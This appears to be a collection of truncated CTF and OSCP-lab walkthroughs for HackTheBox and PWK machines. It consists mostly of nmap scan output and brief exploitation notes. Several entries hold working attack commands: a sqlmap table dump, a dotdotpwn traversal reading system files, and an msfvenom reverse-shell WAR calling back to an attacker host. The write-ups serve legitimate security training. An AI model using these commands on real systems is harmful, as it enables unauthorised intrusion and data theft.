10.10.10.133 OneTwoSeven
Nmap 7.70 scan initiated Sat Aug 24 17:56:26 2019 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.133.nmap 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.26s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
|   256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_  256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open  http    Apache ...
HTB-Challenges Freelancer
At first glance there is nothing special or interesting in the functionality. At the end you can submit a form, but the form's functionality is actually unfinished and it cannot be submitted, so nothing interesting there.
Looking at the page source, there are some interesting comments.
On first look I guessed there might be SQL injection.
Ran sqlmap over it, and indeed there was.
First, dump the interesting database contents.
sqlmap -u http://docker.hackthebox.eu:32943/portfolio.php?id=1 -T safeadmin --dump
[21:03:35] [INFO] fetching entries for table 'safeadmin' in database 'freelancer'
Database: freelancer
Table: safeadmin
[1 entry]
+----+----------+------------------------------------------------------------------+---------------------+
| id | username | password                                                         | created_at          |
+----+----------+ ...
HTB-Challenges Emdee five for life
You need to write a script that automatically MD5-hashes the given string and submits it; doing it by hand is too slow and you always get the prompt "Too slow!".
Reference: https://www.cnblogs.com/qftm/p/11260600.html
import requests
import hashlib
import re

url = "http://docker.hackthebox.eu:34650/"

# Reuse one session so the server-side challenge state is kept across the GET and the POST
r = requests.Session()
out = r.get(url)

# Pull the string to be hashed out of the page body; the pattern must isolate
# just that string, otherwise the wrong token gets hashed
rr = re.compile(r"(\S+)", re.I)
str1 = rr.findall(out.text)
str2 = hashlib.md5(str1[0].encode('utf-8')).hexdigest()

# Submit the hash in the same session before the time limit expires
data = {'hash': str2}
out = r.post(url=url, data=data)
print(out.text)
HTB-Challenges Fuzzy
Nothing interesting was found on the home page; given the challenge name, I went straight to fuzzing with dirbuster.
At first fuzzing only turned up /api and some other first-level directories. Requesting /api directly just hangs waiting for a response, so I kept fuzzing for second-level directories.
Visiting
it turns out a parameter is required, so I tried fuzzing parameter names; Burp works for this, or you can keep using dirbuster.
Fuzzing revealed the parameter is reset.
The id still needs to be fuzzed as well.
10.10.10.137 Luke
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0 ...
10.10.10.140 SwagShop
The Nmap scan shows ssh and http open.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_ke ...
TIPS
If the arrow keys do not work inside nc or telnet, for example the up arrow shows up as
^]]D
then prefix the telnet or nc command with rlwrap to fix it.
PWK-LAB 10.11.1.115 Tophat walkthrough
An enum4linux scan shows an old Samba version, 2.2.7.
https://www.exploit-db.com/exploits/10/
Compile and run it.
PWK-LAB 10.11.1.116 Dotty walkthrough
Quick_10.11.1.116.nmap 10.11.1.116
Nmap scan report for 10.11.1.116
Host is up (0.27s latency).
Not shown: 836 closed ports, 158 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
3306/tcp open  mysql
MAC Address: 00:50:56:89:1E:9B (VMware)
dirbuster found two web apps on port 80:
one is phpLiteAdmin and the other is CuppaCMS.
phpLiteAd ...
PWK-LAB 10.11.1.125 Dotty walkthrough
21/tcp  open  ftp  Acritum Femitter Server ftpd
123/tcp open  ntp?
thanks so much to EL
Port 21, Femitter Server ftpd, has a directory traversal exploit: https://www.exploit-db.com/exploits/15445
dotdotpwn -h 10.11.1.125 -m ftp -f ../../../../../../windows/system32/eula.txt
Windows XP SP3, French locale.
Port 123 is actually a hidden HTTP service called MiniShare: https://www.exploit-db.com/exploits/636 (or use msf).
Remember to modify the target, use a non-staged shell, and modify EXITFUNC ...
PWK-LAB 10.11.1.133 Gh0st walkthrough
dirbuster found a hidden page and a script:
var sillydate = 0;
var sillyvar = 0;
function StringArray(_0x5b7ex4) {
    this['length'] = _0x5b7ex4;
    for (var _0x5b7ex5 = 1; _0x5b7ex5 <= _0x5b7ex4; _0x5b7ex5++) {
        this[_0x5b7ex5] = ' ';
    };
};
image = new StringArray(10);
image[0] = 'offsecphun1.gif';
image[1] = 'offsecphun2.png';
image[2] = 'offsecphun1.gif';
image[3] = 'offsecphun2.png';
image[4] = 'offsecphun1.gif';
image[5] = 'of ...
PWK-LAB 10.11.1.136 Sufferance walkthrough
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-01 11:30 CST
Nmap scan report for 10.11.1.136
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
113/tcp open  ident
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:93:19:D4 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
admin/smb/samba_symlink_traversal
read the root filesystem
…
To get a shell, refer to the g0tmi1k tutorial.
PWK-LAB 10.11.1.141 FC4 walkthrough
Nmap scan report for 10.11.1.141
Host is up (0.29s latency).
Not shown: 938 closed ports, 58 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
3306/tcp  open  mysql
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:50:56:89:79:72 (VMware)
Port 10000, Webmin, has a directory traversal exploit,
able to access /etc/shadow and /root/proof.txt
PWK-LAB 10.11.1.145 Helpdesk walkthrough
Nmap scan report for 10.11.1.145
Host is up (0.25s latency).
Not shown: 995 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy
MAC Address: 00:50:56:89:44:7E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotia ...
PWK-LAB 10.11.1.146 Susie walkthrough
Nmap scan report for 10.11.1.146
Host is up (0.28s latency).
Not shown: 985 closed ports, 13 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
MAC Address: 00:50:56:89:06:61 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds
ProFTPD 1.3.3a has a public exploit:
https://github.com/Muhammd/ProFTPD-1.3.3a
PWK-LAB 10.11.1.209 Kraken walkthrough
Running Tomcat.
Tomcat manager credentials: tomcat:tomcat
Upload a WAR file:
root@kali:~/PWK/10.11.1.209# msfvenom -p java/shell_reverse_tcp LHOST=10.11.0.80 LPORT=443 -f war >> shell.war
Payload size: 13400 bytes
Final size of war file: 13400 bytes
http://10.11.1.209:8080/shell
PWK-LAB 10.11.1.202 Hotot walkthrough
# Nmap 7.70 scan initiated Thu May 2 19:23:53 2019 as: nmap -Pn -sCV -p21,80,135,139,443,445,1030,1032,1033,1038,1521,2030,2100,3372,3389,4443,7778,8080 -oN nmap/Basic_10.11.1.202.nmap 10.11.1.202
Nmap scan report for 10.11.1.202
Host is up (0.28s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd 5.0
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT version 5.0
80/tcp open  http    Microsoft IIS httpd 5.0
| http-cookie-flags:
| ...
PWK-LAB 10.11.1.217 Hotline walkthrough
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 13:12 CST
Nmap scan report for 10.11.1.217
Host is up (0.29s latency).
Not shown: 987 closed ports, 2 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
4 ...
PWK-LAB 10.11.1.219 edbmachine walkthrough
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 20:52 CST
Nmap scan report for 10.11.1.219
Host is up (0.25s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:89:12:24 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds
http://10.11.1.219/html5/
Port knocking
PWK-LAB 10.11.1.223 Jeff walkthrough
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-04 14:40 CST
Warning: 10.11.1.223 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.11.1.223
Host is up (0.27s latency).
Not shown: 853 closed ports, 134 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3306/tcp open  mysql
33 ...